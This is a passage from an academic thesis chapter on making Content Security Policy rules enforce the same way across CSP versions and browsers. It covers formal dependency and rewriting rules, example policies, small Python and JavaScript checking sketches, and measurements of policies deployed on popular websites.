Ignoring a directive is equivalent to having it allow every content. So the values of the
directives frame-ancestors, base-uri, and manifest-src must always resolve to {∗} in
order for a policy to be dependency-free. This is formalized as D1. It is worth noting that the
manifest-src directive is a special case: it falls back to default-src. Hence,
even when it is not specified in a policy, if the default-src directive is present, the
value of default-src should be {∗}; otherwise the policy is not a DF-CSP.
frame-ancestors ’self’ trusted.com;
Listing 4.1 – D1 problem: in CSP1, the page can be embedded by untrusted.com, in
spite of CSP
The policy in the example above contains a dependency because the directive frame-ancestors
is not backwards compatible. The directive will be ignored in CSP1. Only CSP2 and CSP3
will correctly enforce it.
Semantics of the sandbox directive
When the sandbox directive is present in a policy, it automatically prevents plugins from
loading, no matter the restrictions set on the plugins directive (object-src). This is
formalized as D2. Script execution (script-src) and form submission (form-action) are
also prevented when the sandbox directive is present and does not include allow-scripts
and allow-forms in its values set. These are formalized as D3 and D4, respectively. Finally,
when the sandbox directive is present and allow-same-origin is not in its values set, the
’self’ keyword present in other directives is ignored. We formalize this as D5. It is
worth mentioning the case of the form submission directive form-action. It has only been
introduced in CSP2. As formalized by D4, in a DF-CSP, form submission can be disallowed
(by not including allow-forms in sandbox). Otherwise, if the sandbox directive includes
allow-forms or is not present, then the form submission directive (form-action) should
be treated like the backwards-incompatible directives discussed in the previous paragraph:
it must allow any origin ({∗}), otherwise the policy is not a DF-CSP. This is because the
directive is not supported in CSP1. Below is an example of a policy with dependencies
related to the sandbox directive.
sandbox allow-scripts allow-forms;
script-src ’self’ trusted.com;
form-action ’self’ trusted.com;
object-src ’self’ trusted.com;
Listing 4.2 – D2, D3, D4, D5 problems: sandbox alters the semantics of other directives.
Disregarding the sandbox directive, this policy allows scripts, plugins, and form submis-
sion to the page's own origin (’self’) and trusted.com. Now, considering the policy as
a whole, the presence of the sandbox directive no longer allows plugins. The absence of
allow-same-origin in the sandbox values set creates a unique origin. Unique origins are
incomparable to any other origin [76]. Therefore, a unique origin does not match ’self’,
the origin of the web page where the policy is enforced [261,272,275]. Therefore, even though the
sandbox directive allows scripts and forms (allow-scripts and allow-forms), requests to
load scripts or submit forms can only be made to trusted.com, and not to the page's own
origin, despite the presence of ’self’ in the values of these two directives. Many browsers
we have tested would still allow content from the page's own origin; some allow only scripts,
and others allow any type of content (scripts, forms, etc.). Additionally, the form-action
directive is not known in CSP1 and will be ignored in this version, as is the case for
backwards-incompatible directives (see Section 3.2), leading to differences in semantics.
3. Note that the plugin-types and form-action directives are also backwards-incompatible directives, but
we discuss them in different categories of dependencies, because the former is not supported in Firefox,
and the latter is related to the sandbox directive.
Different directives, different meanings
When different CSP versions use different directives for a single content type, setting
different restrictions on these directives results in different restrictions being enforced
for the same content type, depending on the version of the specification under consider-
ation. This is the case for frames (D6) and workers (D7). In CSP1 and CSP3, frames
are specified with the frame-src directive, while in CSP2, child-src is used instead.
The directives script-src, child-src, and worker-src are used to specify restrictions
on workers in CSP1, CSP2, and CSP3 respectively. D6 checks that the restrictions on the frames
directives (frame-src, child-src) are the same, and D7 that the restrictions on the workers
directives (script-src, child-src, worker-src) are also the same⁴. Otherwise the policy
is not a DF-CSP. The following Listing 4.3 shows a non-DF-CSP due to frames and workers.
script-src trusted.com blob:;
frame-src ’self’;
worker-src ’self’;
Listing 4.3 – D6, D7 problems: in CSP2, workers and frames can be loaded from any
domain, in spite of CSP
Workers are governed by the script-src, child-src, and worker-src directives in CSP1,
CSP2 and CSP3 respectively. Workers can be loaded from trusted.com in CSP1, from any
domain in CSP2 (because child-src is missing), and from the page's own origin in CSP3. Frames
are governed by the frame-src (CSP1, CSP3) and child-src (CSP2) directives. Therefore,
in CSP1 and CSP3, frames can load only from the page's own origin, while in CSP2 they
can load from any origin (because the child-src directive is missing).
4. In practice, only same-origin or blob: workers are allowed. Therefore, it would have been sufficient to
ensure that the effective restrictions on workers (page origin and/or blob:) are equal in the three directives.
Browser specific APIs
We consider the following CSP in order to illustrate dependencies due to browser-specific
APIs.
script-src ’self’;
object-src trusted.com;
style-src ’none’;
plugin-types application/pdf;
Listing 4.4 – D8, D9, D10, D11 problems: plugins can load scripts and scripts can load
fonts, in spite of CSP
The plugin-types directive The plugin-types directive is not part of CSP1. More-
over, it is not supported in Firefox, which otherwise supports the other directives of CSP2 and
some features of CSP3. So Firefox and CSP1-compliant browsers will ignore this directive,
meaning they will always allow any type of plugin to load from all origins specified in
the plugins directive (object-src). According to the specification [272,275], when the
plugin-types directive is present in a policy, it further restricts plugins (object-src)
by specifying precisely which types of plugins are allowed in an application (PDF, Java,
Adobe Flash, etc.). Unfortunately, it is not possible to include the plugin-types directive in
a policy in order to allow any type of plugin (there is no default value which resolves to all
types of plugins, as there is for instance with {∗}, which in a directive such as img-src
would allow images from all origins). Hence, when this directive is used in a policy, plugins
(object-src) should not be allowed, otherwise the policy is not a DF-CSP. This is expressed
as D8. Listing 4.4 shows an example of a non-dependency-free policy because of D8.
According to this policy, in browsers such as Chrome and Opera, only PDF documents are
allowed as plugins, while in Firefox and CSP1-compliant browsers, any type of plugin can
load, because these browsers do not support the plugin-types directive.
Loading Scripts via Flash Plugins In CSP, the script-src directive normally re-
stricts the origins of scripts, and object-src restricts the origins of plugins. However,
Flash plugins can also execute scripts. So, script execution in an application concerns
both script-src and object-src (when Flash plugins can execute). By default,
Firefox does not allow the execution of Flash plugins. Users requiring Flash plugins have
to manually install the Adobe Flash player to do so. Thus, for users who do not install Flash
in their browsers, script execution is limited to the script-src directive only, while in other
browsers, the Flash plugins allowed by object-src can also execute scripts. As long
as the object-src directive only allows origins which are already permitted by the script-src
directive, then, even though Flash plugins can load (allowing them to execute scripts), the
policy is a DF-CSP. This is because (normal) scripts are allowed to load from the same origins.
This is formalized as D9: the object-src directive should not allow origins which are not
already allowed by script-src (see Listing 4.4 for an example). This is different from
the suggestion of Weichselbaum et al. [267] that one must always prevent plugins in a pol-
icy. We rather safely argue that plugins can be allowed to load, even Flash plugins, as long
as the object-src directive does not allow more origins than the script-src directive.
In this case, even though Flash plugins can load scripts, this is done from origins that are
already allowed by the script-src directive.
Workers and connections depend on script execution Workers and connections
are JavaScript APIs [12,128,150], and can only be used when script execution is enabled. In
browsers where plugins cannot execute scripts, if normal scripts (script-src) cannot load,
then workers cannot load either, no matter the origins whitelisted in their related directives.
However, in browsers where plugins can also execute scripts, disallowing normal script
execution is not sufficient to prevent workers or connections. If plugins
are allowed, workers can also load and connections can be made, leading to a different
semantics depending on the browser under consideration. Therefore, when normal script
execution is not enabled, one has to ensure that either plugins cannot load, or loading
workers and making connections is explicitly disallowed. This is expressed as D10, and
Listing 4.4 shows an example.
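As an illustration, the following minimal Python sketch checks conditions D9 and D10 on the dict representation, reusing the lookup() function sketched in Section 3.1. The subset test is a purely syntactic approximation (it assumes redundant values have been expanded away, as required for well-formed policies); function names are ours.

def holds_d9(policy):
    """object-src must not be more permissive than script-src."""
    return lookup(policy, "object-src") <= lookup(policy, "script-src")

def holds_d10(policy):
    """If scripts are disabled, plugins or workers/connections must be too."""
    if lookup(policy, "script-src") != {"'none'"}:
        return True   # D10 only constrains policies that disable scripts
    return (lookup(policy, "object-src") == {"'none'"} or
            all(lookup(policy, t) == {"'none'"}
                for t in ("connect-src", "child-src", "worker-src")))

# Listing 4.4 violates D9: plugins may load from trusted.com, scripts may not.
listing_4_4 = {"script-src": {"'self'"}, "object-src": {"trusted.com"},
               "style-src": {"'none'"}, "plugin-types": {"application/pdf"}}
print(holds_d9(listing_4_4), holds_d10(listing_4_4))   # False True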
Fonts depend on stylesheets and also on script execution Traditionally, fonts were
loaded via stylesheets (style-src). But with the introduction of the CSS Font Loading
API [43], already supported by major browsers, fonts can also be loaded via script execu-
tion. So, in browsers not supporting the API, when stylesheets cannot be loaded, fonts
cannot be loaded either. However, in browsers supporting the API, if script execution
is enabled, fonts can still be loaded even though stylesheets cannot. This is
expressed as D11. Therefore, when stylesheets cannot be loaded, one has to ensure that
fonts cannot be loaded either (i.e., fonts or script execution are explicitly disallowed by
the CSP policy). An example is given in Listing 4.4.

(R1) ∀ t ∈ {frame-ancestors, base-uri, manifest-src}, if d⃗(t) ≠ {∗} then d⃗(t) := {∗}
(R2) if sandbox v ∈ d⃗ then d⃗(object-src) := {’none’}
(R3) if sandbox v ∈ d⃗ and allow-scripts ∉ v, then d⃗(script-src) := {’none’}
(R4) if sandbox v ∈ d⃗ and allow-forms ∉ v, then d⃗(form-action) := {’none’},
     else d⃗(form-action) := {∗}
(R5) if sandbox v ∈ d⃗ and allow-same-origin ∉ v, then ∀ t v′ ∈ d⃗, d⃗(t) := v′ − {’self’}
(R6) T = {frame-src, child-src}, t1, t2 ∈ T, v1 = d⃗(t1) and v2 = d⃗(t2).
     ∀ t ∈ T, d⃗(t) := v1 ∪ v2
(R7) T = {script-src, child-src, worker-src}, t1, t2, t3 ∈ T,
     v1 = d⃗(t1) and v2 = d⃗(t2) and v3 = d⃗(t3). ∀ t ∈ T, d⃗(t) := v1 ∪ v2 ∪ v3
(R8) if plugin-types v ∈ d⃗ then d⃗(plugin-types) := ⊥ or d⃗(object-src) := {’none’}
(R9) o = object-src, s = script-src, v1 = d⃗(o) and v2 = d⃗(s).
     d⃗(o) := {’none’} or d⃗(o) := v1 ∩ v2 or ∀ t ∈ {o, s}, d⃗(t) := v1 ∪ v2
(R10) v = d⃗(script-src). if v = {’none’} then d⃗(object-src) := {’none’} or
      ∀ t ∈ {connect-src, child-src, worker-src}, d⃗(t) := {’none’}
(R11) v = d⃗(style-src). if v = {’none’} then d⃗(font-src) := {’none’} or
      ∀ t ∈ {script-src, object-src}, d⃗(t) := {’none’}
Table 4.4 – Rewriting Rules
3.3 Rewriter for building DF-CSP for CSP1, CSP2, and CSP3
The goal of the rewriter is to transform a CSP policy into a DF-CSP. The rules are presented
in Table 4.4. Each rewriting rule Ri resolves the dependency Di with the same number.
Intuitively, each rewriting rule Ri applies a set of guidelines and modifications to a policy
in order to make the condition Di hold. Now, we prove that each rewriting rule effectively
resolves the related dependency.
The rules are meant for developers willing to build or refactor policies so that they are
equally enforced in different browsers.
(R1) Applying R1 results in removing any restrictions on the directives frame-ancestors,
base-uri, and manifest-src. For the frame-ancestors and base-uri directives, one can
simply remove them from the policy. If default-src is not specified, one can also
remove the manifest-src directive from the policy. Otherwise, one has to explicitly add
it to the policy, setting its values to {∗}. This basically means that no restrictions are set
on the directive. R1 ensures that no restrictions are set on the directives frame-ancestors,
base-uri, and manifest-src, thereby making D1 hold.
(R2) When the sandbox directive is present in a policy, R2 sets the object-src directive
values to {’none’}. This is exactly the semantics of the sandbox directive regarding plugins,
as stated in the HTML5 standard [70]. This makes D2 hold.
(R3) When the sandbox directive is present without specifying allow-scripts in its
values, then script execution is not allowed. R3 changes the script-src directive to
{’none’}. This makes D3 hold.
(R4) Similarly, when the sandbox directive is present without specifying allow-forms,
then form submission is not allowed. R4 sets the form-action directive to {’none’}.
Otherwise, form submission must be allowed to any origin, because the directive is ignored
in CSP1; in this case, R4 sets the form-action directive values to {∗}. Either of these
rewritings makes D4 hold.
(R5) The absence of allow-same-origin in the sandbox directive results in a mismatch
between ’self’ and a page's own origin. This is equivalent to not having the ’self’
keyword in any directive. To this end, R5 removes this keyword from any directive values
where it is found, making D5 hold.
(R6) The frame-src and child-src directives both concern frame inclusion. R6 rewrites
them so that they have the same restrictions. Either both directives are set to the values
of one of them, or to the union of the values of both. In any case, the result is
that they will have the same values, which makes D6 hold.
(R7) Similarly, the script-src, child-src, and worker-src directives concern workers. R7
rewrites these directives so that they have the same values. All directives can either be
assigned the values of one of them, the union of the values of two of them, or the union of
the values of all three directives. In any case, these rewritings make D7 hold.
(R8) Since the plugin-types directive is not supported in all browsers, when it is present
in a policy, R8 either removes it (d⃗(plugin-types) := ⊥ means that plugin-types
is not present in, i.e., is removed from, the policy; see Section 3.1 for more details), or it sets the
object-src directive to {’none’}. Either rewriting makes D8 hold. As in the case
of directives that are not backwards compatible, it is recommended not to use plugin-types
in a DF-CSP, as it leads to different semantics.
(R9) The plugins directive object-src should not be more permissive than the script-src di-
rective. To do so, R9 either sets the object-src directive to {’none’} or to the intersection
of object-src and script-src; otherwise it assigns to both directives the union of their
respective values. All these rewritings ensure that object-src is not more permissive than
script-src.
(R10) When scripts are not allowed but connections, workers and plugins are allowed,
then connections can be made and workers can load in browsers allowing script execution
via plugins, while in others this will not be the case. So, when scripts are not allowed,
R10 rewrites the policy so as to prevent plugins, or connections and workers. This makes
D10 hold.
(R11) When stylesheets are not allowed while fonts are still allowed, if script execution
is allowed (either via script-src or object-src), then fonts can still load via script
execution in browsers supporting the CSS Font Loading API [43]. To make D11 hold, R11
rewrites the policy so as to prevent fonts from loading, or to prevent script execution.
3.4 Resolving all Dependencies
Applying the rules in an arbitrary order may lead to a policy that is not a DF-CSP, because
of conflicts between them. Conflicts arise between two rules when both of them modify
the same directive. Below are the directives whose modifications introduce conflicts.
object-src   R2, R8, R9, R10, R11
script-src   R3, R7, R9, R10, R11
child-src    R6, R7, R10
worker-src   R7, R10
A rule of thumb when applying these rules is that a directive value should not change twice.
Considering child-src, if R6 modifies its value to v, while R7 modifies it to another value
v′ different from v, then R7 reintroduces in the policy the dependency D6 that R6 has just
resolved. When a directive is modified, it is better to fix its value and no longer alter
it in subsequent rewriting rules, in order to avoid entering infinite loops and failing to make
the policy a DF-CSP.
Since content injection attacks in web applications are carried out through script execution,
we propose the following order for applying the rewriting rules (a minimal sketch of this
procedure is given at the end of this subsection).
— The first 5 rules (R1, R2, R3, R4, R5) can be applied in any order. They are indepen-
dent from one another.
— Resolve the dependency between the plugins and plugin types directives, by applying R8.
— Then apply the rules related to script execution: R9, R10, R11. Then fix the values.
— Then apply R7 for workers, then R6 for frames.
The rule of thumb applies here: when a directive is modified, fix its value and no longer
alter it in subsequent rules.
One of the rewriting options we propose in rules R6, R7, R9 is to assign to the set of directives
under consideration (frame-src and child-src in the case of R6) a new set of values,
computed as the union of the values of all the directives or of a subset of them. We recommend
to always compute the union of all of the directives in the set, instead of selecting only
a subset of them. Even though the resulting CSP may be more permissive, at least it
preserves the semantics of the policy and does not break the application.
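To make the ordering concrete, here is a minimal sketch in Python (ours), on the policy dict representation used in the earlier sketches. Only R1-R5 and R8 are spelled out, since they are simple and independent; R9-R11, R7 and R6 are left as a comment to keep the sketch short, but they would be applied in exactly the order given above, fixing each directive's value once it has been modified.

def r1(p):   # no restrictions on backwards-incompatible directives
    for t in ("frame-ancestors", "base-uri"):
        p.pop(t, None)
    if "default-src" in p:
        p["manifest-src"] = {"*"}   # must be explicit, since it falls back
    else:
        p.pop("manifest-src", None)

def r2_to_r5(p):   # semantics of the sandbox directive
    if "sandbox" not in p:
        return
    flags = p["sandbox"]
    p["object-src"] = {"'none'"}                                        # R2
    if "allow-scripts" not in flags:
        p["script-src"] = {"'none'"}                                    # R3
    p["form-action"] = {"*"} if "allow-forms" in flags else {"'none'"}  # R4
    if "allow-same-origin" not in flags:                                # R5
        for t in list(p):
            p[t] = p[t] - {"'self'"}

def r8(p):   # plugin-types is not supported everywhere: drop it
    p.pop("plugin-types", None)

def rewrite(p):
    r1(p)
    r2_to_r5(p)
    r8(p)
    # then R9, R10, R11 (script execution), then R7 (workers), then R6 (frames)
    return p

print(rewrite({"sandbox": {"allow-forms"}, "script-src": {"'self'", "trusted.com"},
               "object-src": {"trusted.com"}}))
# object-src and script-src become {'none'} and form-action becomes {*};
# the omitted rules would further set child-src, worker-src and frame-src,
# yielding a policy of the shape of Listing 4.7 below.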
Correctness
Dependencies D2, D3, D4, D5 are related to the sandbox directive. The rewriting rules
R2, R3, R4, R5 strictly follow from the specification [261,272,275] and the semantics of
sandbox [76]. Applying these rules does not modify the semantics of a policy and is com-
pliant with the CSP specification. Since most browsers do not properly support the sandbox
directive, implementing our rewriting rules can help them comply with the specification
regarding this directive and its influence on other directives. Developers can also apply
these rules to their policies prior to deploying them, in order to ensure that the sandbox
directive will be correctly enforced in all browsers, with respect to its influence on other
directives.
The remaining rules are meant as guidelines for developers willing to build policies which are
dependency-free, with equivalent semantics in all browsers. Dependency D1 concerns
directives which are not backwards compatible across the different CSP versions. In other
words, they do not have equivalents in all versions of the specification, meaning they will
be ignored in those versions. These directives should not set any restrictions on the type
of content they are related to, as suggested in R1. Basically, a policy should not set
restrictions on forms, application manifests, etc.
R6 ensures that restrictions on frames are the same in all versions of CSP. R7 concerns
workers. R8 relates to the fact that the plugin-types directive is not supported in all versions
of the specification. The best solution is not to use this directive at all in a policy. R9
ensures that the restrictions set on plugins are not more permissive than those on scripts, since
(Flash) plugins could execute additional scripts in some browsers and not in others. R10
ensures that when normal script execution is not allowed, plugins cannot load either.
Otherwise, in some browsers, plugins could still make connections or load workers, while in
other browsers this would not be the case. Finally, R11 ensures that when stylesheets
cannot load, fonts cannot load either. Otherwise, if script execution is enabled, fonts can
still load in some browsers, while in others this would not be the case.
Example of dependency-free policies
To summarize, a dependency-free policy is a policy which:
— does not set any restriction on frame-ancestors, base-uri, plugin-types, or manifest-src.
— either prevents form submission or allows form submission to any origin.
— applies the same restrictions to the frames directives (frame-src, child-src) and to the
workers directives (script-src, child-src, and worker-src).
— when stylesheets are not allowed, does not allow fonts either; otherwise scripts
can load fonts.
— has an object-src directive that is at most as permissive as the script-src directive;
otherwise, plugins can execute additional scripts in browsers supporting Flash.
Below are examples of DF-CSP policies.
default-src trusted.com;
manifest-src *;
Listing 4.5 – Policies should not set any restriction on manifests, and other backwards
incompatible directives
script-src ’self’ trusted.com;
child-src ’self’ trusted.com;
frame-src ’self’ trusted.com;
worker-src ’self’ trusted.com;
object-src trusted.com;
Listing 4.6 – Scripts, frames, and workers should have the same restrictions. The plugins
directive should be less permissive than the scripts directive
sandbox allow-forms;
object-src ’none’;
script-src ’none’;
child-src ’none’;
worker-src ’none’;
frame-src ’none’;
form-action *;
Listing 4.7 – Sandbox prevents plugins and scripts execution. So, frames and workers
should also be prevented. ’self’ should not be used in directive values. Forms can
be submitted to any origin
style-src ’none’;
font-src ’none’
Listing 4.8 – Policies should explicitly prevent fonts when stylesheets are not allowed
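Putting the earlier sketches together, the following Python fragment checks a policy dict against the summary above; it reuses lookup(), holds_d9() and holds_d10() from the previous sketches, and only includes the conditions that are easy to state syntactically (D2-D5, D8 and D11 are omitted for brevity). All names are ours.

def is_df_csp(p):
    d1 = all(lookup(p, t) == {"*"}
             for t in ("frame-ancestors", "base-uri", "manifest-src"))
    d6 = lookup(p, "frame-src") == lookup(p, "child-src")
    d7 = (lookup(p, "script-src") == lookup(p, "child-src")
          == lookup(p, "worker-src"))
    return d1 and d6 and d7 and holds_d9(p) and holds_d10(p)

# Listing 4.6 above passes these checks.
listing_4_6 = {"script-src": {"'self'", "trusted.com"},
               "child-src": {"'self'", "trusted.com"},
               "frame-src": {"'self'", "trusted.com"},
               "worker-src": {"'self'", "trusted.com"},
               "object-src": {"trusted.com"}}
print(is_df_csp(listing_4_6))   # True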
3.5 Dependencies between CSP2 and CSP3 implementations
We want to assess how the dependencies and rewriting rules change if we consider only
CSP2 and CSP3. In fact, CSP2 has a lot in common with CSP3, and we are not aware
of any modern browser that supports only CSP1. A scenario in which only CSP2 and CSP3
are considered is more realistic, and representative of current CSP implementations by
browsers in the wild [21].
The changes w.r.t. the dependencies and rewriting rules for the three versions (CSP1,
CSP2, CSP3), summarized in Table 4.5, are the following.
(D1) v = d⃗(manifest-src) ⇒ v = {∗}
(D4) sandbox v ∈ d⃗ ∧ allow-forms ∉ v ∧ v′ = d⃗(form-action) ⇒ v′ = {’none’}
(D7) v = d⃗(child-src) ∧ v′ = d⃗(worker-src) ⇒ v = v′
(R1) if d⃗(manifest-src) ≠ {∗} then d⃗(manifest-src) := {∗}
(R4) if sandbox v ∈ d⃗ and allow-forms ∉ v, then d⃗(form-action) := {’none’}
(R7) T = {child-src, worker-src}, t1, t2 ∈ T, v1 = d⃗(t1) and v2 = d⃗(t2).
     ∀ t ∈ T, d⃗(t) := v1 ∪ v2
Table 4.5 – Dependencies and rewriting rules considering only CSP2 and CSP3 and their
implementations in browsers
— Only the manifest-src directive of CSP3 is backwards incompatible, since it does
not have an equivalent in CSP2. So D1 and R1 are changed to contain only this
directive.
— Since form-action is part of both CSP2 and CSP3, D4 and R4 are modified
accordingly. Specifically, the form-action directive is set to {’none’} if the sandbox
directive is present and does not include the allow-forms value.
— The script-src directive is no longer linked to workers. The directives related to work-
ers are child-src and worker-src in CSP2 and CSP3 respectively. Therefore,
script-src is removed from D7 and R7.
— The other dependencies (see Table 4.3) and rules (see Table 4.4) remain unchanged.
Of the examples of DF-CSP presented in Section 3.4, only the policy shown in Listing 4.7
changes, as shown in the example below.
sandbox allow-forms;
object-src ’none’;
script-src ’none’;
child-src ’none’;
worker-src ’none’;
frame-src ’none’;
form-action ’self’ trusted.com;
The form-action directive is no longer limited to {∗} when the sandbox directive is speci-
fied with allow-forms. It can take any set of trusted origins, while still keeping the policy
a DF-CSP.
3.6 Dependencies between CSP2 and CSP3 specifications
In previous sections, we focused on the differences in CSP specifications as well as the pecu-
liarities of their implementations in browsers. For instance, the dependencies and rewriting
rules take into consideration the fact that Firefox does not support the plugin-types di-
rective. Here, we consider only CSP2 and CSP3, as they are described in the specification,
and discuss the dependencies and rewriting rules in this scope only. Table 4.6 presents the modifications that this implies to the original dependencies and rewriting rules presented in Tables 4.3 and 4.4.
— The changes in dependencies D1, D4, D7, and the related rewriting rules R1, R4, R7
are the same as described in Table 4.5 for the case where CSP2 and CSP3 are con-
sidered as well as their implementations in browsers.
(D8) v = d⃗_plugin-types, v′ = d⃗_object-src. v = {’none’} ⇒ v′ = {’none’}
(D9) v = d⃗_object-src, v′ = d⃗_script-src. v ⊆ v′ ∨ (plugin-types ∈ d⃗, v″ = d⃗_plugin-types ∧ application/x-shockwave-flash ∉ v″)
(D10) v = d⃗_object-src, v′ = d⃗_script-src. v′ = {’none’} ⇒ v = {’none’} ∨ (plugin-types ∈ d⃗, v″ = d⃗_plugin-types ∧ application/x-shockwave-flash ∉ v″) ∨ (∀t ∈ {connect-src, worker-src, child-src}, v‴ = d⃗_t ⇒ v‴ = {’none’})
(D11) v1 = d⃗_style-src, v2 = d⃗_font-src, v3 = d⃗_script-src, v4 = d⃗_object-src. v1 = {’none’} ⇒ v2 = {’none’} ∨ (v3 = {’none’} ∧ (v4 = {’none’} ∨ (plugin-types ∈ d⃗, v = d⃗_plugin-types ∧ application/x-shockwave-flash ∉ v)))
(R8) v = d⃗_plugin-types, v′ = d⃗_object-src. if v = {’none’} ∧ v′ ≠ {’none’} then (v″ ≠ {’none’} ∧ d⃗_plugin-types = v″) ∨ d⃗_object-src = {’none’}
(R9) v = d⃗_script-src, v′ = d⃗_object-src, v″ = d⃗_plugin-types. if v ⊂ v′ then d⃗_plugin-types = v″ − {application/x-shockwave-flash} ∨ d⃗_object-src = {’none’} ∨ d⃗_object-src = v ∩ v′ ∨ ∀t ∈ {script-src, object-src}, v1, v2 ∈ {v, v′}, d⃗_t = v1 ∪ v2
(R10) v = d⃗_script-src, v′ = d⃗_object-src, v″ = d⃗_plugin-types. if v = {’none’} then d⃗_object-src = {’none’} ∨ d⃗_plugin-types = v″ − {application/x-shockwave-flash} ∨ ∀t ∈ {child-src, worker-src, connect-src}, d⃗_t = {’none’}
(R11) v = d⃗_script-src, v′ = d⃗_object-src, v″ = d⃗_plugin-types. if d⃗_style-src = {’none’} then d⃗_font-src = {’none’} ∨ ((d⃗_plugin-types = v″ − {application/x-shockwave-flash} ∨ d⃗_object-src = {’none’}) ∧ d⃗_script-src = {’none’})
Table 4.6 – Dependencies and rewriting rules for CSP2 and CSP3, according to the specifications. We consider only browsers whose implementations are compliant with the specifications.
— According to the specification, when no specific type of plugins is allowed, then plugins themselves are not allowed. Normally, the specification requires that the plugin-types directive always specify at least one value when it is included in a policy [275]. But nothing prevents one from adding no values to this directive, making it {’none’}. When this is the case, plugins (object-src) are not allowed to execute. D8 and R8 are modified accordingly.
— Regarding script execution via plugins, since only Flash plugins can execute scripts, the plugin-types directive does not introduce a dependency unless it explicitly allows Flash plugins (application/x-shockwave-flash) or is absent (which means that any type of plugins is allowed). This consequently changes dependencies D9, D10, D11 and rewriting rules R9, R10, R11, which describe the fact that plugins can execute scripts, and therefore make connections, load workers or fonts.
— Other directives are unchanged.
Below are examples of DF-CSP according to the CSP2 and CSP3 specifications, assuming that browsers implement them correctly.
Table 4.7 – Dependencies in the wild, considering CSP1, CSP2, CSP3 and their implementations in browsers.
Dependency   #Pages              #Origins   #Sites
D1           134,339 (60.61%)    6,282      3,814
D2           23                  5          5
D3           43                  1          1
D4           49                  2          2
D5           43                  1          1
D6           48,068 (21.69%)     1,726      1,302
D7           71,161 (32.11%)     2,888      2,076
D8           206                 8          8
D9           26,739 (12.08%)     905        695
D10          0                   0          0
D11          0                   0          0
script-src ’self’;
object-src *;
plugin-types application/pdf;
This policy allows scripts from the page's own origin, and plugins from any origin. Nonetheless, only PDF plugins are allowed, and not Flash, which can execute scripts. This policy is DF-CSP according to the CSP2 and CSP3 specifications, even though the object-src directive is more permissive than the script-src directive.
4 Dependencies in the wild
We collected and analyzed the CSP of pages from the top 100k Alexa sites, in order to assess the prevalence of dependencies (Table 4.3). To collect policies, we used SlimerJS [130] running on Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0. We visited the homepages, as well as links found on each homepage pointing to the same site or its subdomains.
To analyze policies, we implemented a tool with a full CSP parser according to the specification [275] (for checking whether a directive allows a URL to load). It can compare the permissiveness of two policies, and detect when one CSP directive allows more origins than the other [255]. It can also detect dependencies as discussed in this work.
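As an illustration of the permissiveness comparison, the following is a minimal sketch, not the tool itself; origin matching is simplified to exact origins, the ∗ wildcard and *.domain subdomain wildcards, and all names are illustrative.

// true if the source expression `allowed` covers the given origin (simplified matching)
function covers(allowed, origin) {
  if (allowed === "*") return true;              // the wildcard source allows any origin
  if (allowed.startsWith("*.")) {
    return origin.endsWith(allowed.slice(1));    // "*.example.com" covers "www.example.com"
  }
  return allowed === origin;                     // otherwise require an exact match
}

// true if every origin whitelisted in values1 is also allowed by values2,
// i.e. the first directive is at most as permissive as the second
function atMostAsPermissive(values1, values2) {
  return values1.every(v1 => values2.some(v2 => covers(v2, v1)));
}

// Example: object-src allowing an origin that script-src does not would be a D9 candidate
atMostAsPermissive(["trusted.com"], ["trusted.com", "*.cdn.com"]); // true
atMostAsPermissive(["evil.com"], ["trusted.com"]);                 // false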
We found 221,638 pages deploying CSP. They are spread over 18,673 origins from 13,226 sites out of the 100k Alexa sites (13.22%). Policies with dependencies (for the scenario where all CSP versions and browser implementations are considered) are presented in Table 4.7.
As one can observe from Table 4.7, the most prevalent reason why policies are not DF-CSP is D1, which relates to the use of backwards-incompatible directives in policies. Recall that the mere presence of these directives in a policy introduces dependencies when they do not have an equivalent in other versions of the specification. Hence, 60.61% of the deployed CSPs use directives (frame-ancestors, base-uri, manifest-src) that are not known to all versions of CSP. This result also includes policies which set the form-action directive to values other than {’none’} or {∗}. Since this directive is not part of CSP1, restrictions set on it are ignored by CSP1-only browsers, leading to dependencies.
Another dependency widely present in policies is D7, which concerns workers. Workers are governed by three different directives, one per CSP version (script-src, child-src, worker-src). Hence, 32.11% of the policies we have analyzed do not set the same restrictions on the workers
directives.
As the results show for D6, 21.69% of the deployed policies set different restrictions on the frames directives (frame-src, child-src).
We found 12.08% of pages allowing script execution via (Flash) plugins (object-src) from origins not whitelisted in the script-src directive.
Some 206 pages use the plugin-types directive, which results in different enforcement because the directive is not supported by CSP1 or by Firefox. The results show that the sandbox directive (D2, D3, D4, D5) is not widespread among policies. In particular, a single site makes use of the sandbox directive without allow-same-origin, but with ’self’ in its CSP directive values (D5). Finally, we found no policy that disallows scripts (script-src) while allowing workers and connections via plugins (D10). Nor did we find policies that disallow stylesheets while allowing fonts to be loaded via scripts (D11).
4.1 Validity of the statistics
A criticism that could be directed at the results presented here concerns their validity, because we collected the policies using a specific browser. In particular, if a web server indeed checks the User-Agent string to send a specific CSP, then for all the requests it is clear that we obtained a policy for Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0. However, this exactly means that the related server is not maintaining a single policy, but rather multiple policies, one per browser. This implies that the policy we obtained from the server is not DF-CSP. Otherwise, if the policy sent by the server is the same for any browser, then it is not DF-CSP according to our analysis. Therefore, all the results reported here are valid, even though the server may have served a specific CSP based on the User-Agent string we sent during the crawling process.
5 Tool for building effective policies
The main goal of the tool is to assist developers in building effective policies. It is able to detect common errors reported by Calzavara et al. [177], resolve dependencies, reduce policies by removing semantic redundancies in directive values, and provide the semantics of the policy. The tool also checks that policies are well-formed as specified in Section 3.1. To do so, it removes unknown directives and their values; removes unknown directive values, keeping only those allowed by the specification; removes duplicated directives, keeping only the first occurrence; and expands policies by explicitly adding directives that fall back to default-src when they are missing and default-src is present. Building a single policy from a conjunction of multiple policies is achieved by computing the intersection of the sets of whitelisted origins of each directive across the policies. The tool is available online 5.
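To make the conjunction step concrete, here is a minimal sketch, not the actual tool: policies are modelled as plain objects mapping directive names to arrays of sources, and origins are compared as exact strings (wildcards are ignored in this simplification).

function intersectPolicies(p1, p2) {
  const result = {};
  for (const directive of Object.keys(p1)) {
    if (!(directive in p2)) continue;                          // keep directives present in both policies
    const common = p1[directive].filter(src => p2[directive].includes(src));
    result[directive] = common.length ? common : ["'none'"];   // no common source means nothing is allowed
  }
  return result;
}

// Example: only trusted.com is whitelisted by both script-src directives
intersectPolicies(
  { "script-src": ["'self'", "trusted.com"] },
  { "script-src": ["trusted.com", "cdn.com"] }
); // { "script-src": ["trusted.com"] }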
All of its features are described below for the dependencies and rewriting rules in Tables 4.3
and 4.4 for all the versions of CSP.
